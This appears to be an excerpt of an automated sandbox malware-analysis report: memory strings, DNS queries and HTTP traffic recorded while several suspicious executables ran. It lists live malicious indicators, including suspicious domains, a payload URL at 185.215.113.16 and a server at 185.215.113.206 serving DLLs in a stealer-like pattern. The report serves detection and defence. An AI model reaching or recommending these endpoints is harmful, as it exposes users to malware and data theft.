                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
                              Source: firefox.exe, 00000030.00000002.3592510223.000002238B545000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Failed to listen. Callback argument missing.@mozilla.org/network/protocol;1?name=defaultFailed to listen. Listener already attached.Unable to start devtools server on Failed to execute WebChannel callback:releaseDistinctSystemPrincipalLoader{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}WebChannel/this._originCheckCallbackresource://devtools/shared/security/socket.js^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)Got invalid request to save JSON dataJSON Viewer's onSave failed in startPersistencebrowser.fixup.domainsuffixwhitelist.devtools/client/framework/devtools@mozilla.org/uriloader/handler-service;1get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPget FIXUP_FLAGS_MAKE_ALTERNATE_URIdevtools.debugger.remote-websocketdevtools.performance.popup.feature-flagdevtools/client/framework/devtools-browserresource://devtools/server/devtools-server.jsDevTools telemetry entry point failed: @mozilla.org/dom/slow-script-debug;1browser.urlbar.dnsResolveFullyQualifiedNames^([a-z+.-]+:\/{0,3})*([^\/@]+@).+DevToolsStartup.jsm:handleDebuggerFlag@mozilla.org/network/protocol;1?name=fileget FIXUP_FLAG_FORCE_ALTERNATE_URI^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?No callback set for this channel.browser.fixup.dns_first_for_single_wordsdevtools.performance.recording.ui-base-url@mozilla.org/uriloader/web-handler-app;1extractScheme/fixupChangedProtocol<resource://gre/modules/JSONFile.sys.mjshttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://poczta.interia.pl/mh/?mailto=%shttp://www.inbox.lv/rfc2368/?value=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/NetUtil.sys.mjsresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/JSONFile.sys.mjshandlerSvc fillHandlerInfo: don't know this typeresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjs@mozilla.org/network/async-stream-copier;1gecko.handlerService.defaultHandlersVersionresource://gre/modules/URIFixup.sys.mjs@mozilla.org/network/file-input-stream;1@mozilla.org/uriloader/local-handler-app;1isDownloadsImprovementsAlreadyMigrated{c6cf88b7-452e-47eb-bdc9-86e3561648ef}_injectDefaultProtocolHandlersIfNeededhttps://mail.inbox.lv/compose?to=%s{33d75835-722f-42c0-89cc-44f328e56a86}http://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.yahoo.co.jp/compose/?To=%s@mozilla.org/uriloader/dbus-handler-app;1https://poczta.interia.pl/mh/?mailto=%sCan't invoke URIFixup in the content processScheme should be either http or httpsresource://gre/modules/DeferredTask.sys.mjs_finalizeInternal/this._finalizePromise<resource://gre/modules/FileUtils.sys.mjs@mozilla.org/network/input-stream-pump;1SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLFirst argument should be an nsIInputStreamNon-zero amount of bytes must be specified@mozilla.org/intl/converter-input-stream;1@mozilla.org/scriptableinputstream;1https://mail.yahoo.co.jp/compose/?To=%snewChannel requires a single object argumenthttps://mail.yandex.ru/compose?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox.lv/compose?to=%shttps://poczta.
                              Source: firefox.exe, 00000030.00000002.3447488113.0000022389D43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
                              Source: firefox.exe, 00000030.00000002.3447488113.0000022389D43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etp*://pixel.advertising.com/firefox-etp*://*.adsafeprotected.com/*/imp/**://trends.google.com/trends/embed**://www.facebook.com/platform/impression.php**://pubads.g.doubleclick.net/gampad/*xml_vmap2**://pubads.g.doubleclick.net/gampad/*xml_vmap1**://*.adsafeprotected.com/*/unit/**://cdn.cmp.advertising.com/firefox-etpexecuteIDB/promise</transaction.onerror equals www.facebook.com (Facebook)
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: onPrefEnabledChanged() - removing gmp directory KEY_PLUGIN_LAST_INSTALL_FAIL_REASONmedia.{0}.allow-x64-plugin-on-arm64startup - adding gmp directory failed with - the given reason to update is not supportedhttps://smartblock.firefox.etp/facebook.svg@mozilla.org/network/atomic-file-output-stream;1FileUtils_openSafeFileOutputStreamwebcompat-reporter%40mozilla.org:1.5.1https://smartblock.firefox.etp/play.svgresource://gre/modules/FileUtils.sys.mjsFileUtils_openAtomicFileOutputStreamFileUtils_closeAtomicFileOutputStreamFileUtils_closeSafeFileOutputStream@mozilla.org/addons/addon-manager-startup;1*://www.everestjs.net/static/st.v3.js*resource://gre/modules/addons/XPIProvider.jsm*://track.adform.net/serving/scripts/trackpoint/*://static.chartbeat.com/js/chartbeat.js*://static.chartbeat.com/js/chartbeat_video.js*://web-assets.toggl.com/app/assets/scripts/*.js*://libs.coremetrics.com/eluminate.jswebcompat-reporter@mozilla.org.xpi@mozilla.org/network/file-output-stream;1*://cdn.branch.io/branch-latest.min.js**://*.imgur.com/js/vendor.*.bundle.jspictureinpicture%40mozilla.org:1.0.0*://pub.doubleverify.com/signals/pub.js**://c.amazon-adsystem.com/aax2/apstag.js*://auth.9c9media.ca/auth/main.js*://static.criteo.net/js/ld/publishertag.js*://connect.facebook.net/*/sdk.js**://*.imgur.io/js/vendor.*.bundle.js*://www.rva311.com/static/js/main.*.chunk.js*://connect.facebook.net/*/all.js*resource://gre/modules/AsyncShutdown.sys.mjs equals www.facebook.com (Facebook)
                              Source: global trafficDNS traffic detected: DNS query: pancakedipyps.click
                              Source: global trafficDNS traffic detected: DNS query: httpbin.org
                              Source: global trafficDNS traffic detected: DNS query: github.com
                              Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                              Source: global trafficDNS traffic detected: DNS query: home.twentytk20ht.top
                              Source: global trafficDNS traffic detected: DNS query: t.me
                              Source: global trafficDNS traffic detected: DNS query: toptek.sbs
                              Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                              Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                              Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
                              Source: global trafficDNS traffic detected: DNS query: www.google.com
                              Source: global trafficDNS traffic detected: DNS query: twentytk20ht.top
                              Source: global trafficDNS traffic detected: DNS query: cheapptaxysu.click
                              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pancakedipyps.click
                              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 21 Dec 2024 21:17:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FCfV9rnjbEd7qFTS288iPOvKMgyKp3pyKebD6q83PvmxPalkB7PyU8HjK8u9cu2x%2BkuVA7%2FwnJHvUEd7WFUiQBah4OrMj7%2Bdrf8dhZ6oYFNpSkUeUlz55i12AdqlGSaRZgaLatQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f5ae6e3f9ee4245-EWR
                              Source: 932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
                              Source: 932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
                              Source: firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                              Source: c9692f9101.exe, 00000014.00000003.3343254367.000000000595E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download
                              Source: c9692f9101.exe, 00000014.00000003.3225782953.000000000595E000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3411644650.000000000595E000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3313908213.000000000595E000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3368923699.000000000595E000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3253255124.000000000595E000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3281565324.000000000595E000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3194039328.000000000595E000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3343254367.000000000595E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download-g
                              Source: c9692f9101.exe, 00000014.00000003.3411644650.000000000595E000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3313908213.000000000595E000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3368923699.000000000595E000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3343254367.000000000595E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadOg
                              Source: c9692f9101.exe, 00000014.00000003.3411644650.000000000595E000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3313908213.000000000595E000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3368923699.000000000595E000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3281565324.000000000595E000.00000004.00000020.00020000.00000000.sdmp, c9692f9101.exe, 00000014.00000003.3343254367.000000000595E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadcgm
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000002.3668631588.000000000071E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe?
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000071E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000002.3668631588.0000000000777000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/(
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll~#?
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.0000000000765000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.0000000000765000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.0000000000765000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll)
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.&
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000071E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.0000000000777000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phplp
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.0000000000777000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/la
                              Source: 85746525a0.exe, 0000000B.00000003.2757106362.00000000032F5000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3234150760.00000000053FE000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3334747442.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                              Source: 85746525a0.exe, 0000000B.00000003.2757106362.00000000032F5000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3234150760.00000000053FE000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3334747442.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                              Source: firefox.exe, 00000030.00000002.3491063189.000002238A382000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://poczta.interia.pl/mh/?mailto=%s
                              Source: firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://poczta.interia.pl/mh/?mailto=%shttp://www.inb
                              Source: firefox.exe, 00000030.00000002.3644428324.000002238C7B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                              Source: powershell.exe, 00000011.00000002.2688444765.00000000034E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
                              Source: powershell.exe, 0000000E.00000002.2636556933.0000000003259000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2688444765.00000000034E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                              Source: 85746525a0.exe, 0000000B.00000003.2757106362.00000000032F5000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3234150760.00000000053FE000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3334747442.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                              Source: fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3160764232.0000015C25123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                              Source: 85746525a0.exe, 0000000B.00000003.2757106362.00000000032F5000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3234150760.00000000053FE000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3334747442.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                              Source: 85746525a0.exe, 0000000B.00000003.2757106362.00000000032F5000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3234150760.00000000053FE000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3334747442.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                              Source: 85746525a0.exe, 0000000B.00000003.2757106362.00000000032F5000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3234150760.00000000053FE000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3334747442.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                              Source: 85746525a0.exe, 0000000B.00000003.2757106362.00000000032F5000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3234150760.00000000053FE000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3334747442.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                              Source: 85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                              Source: fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C0899D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/StoreInstaller;component/Resources/StoreAppList.Light.png
                              Source: fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C0899D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/StoreInstaller;component/Resources/StoreLogo.Light.png
                              Source: fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C08BBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/StoreInstaller;component/Resources/Theme/Light.xaml
                              Source: fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C08BBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/StoreInstaller;component/Resources/app.Light.ico
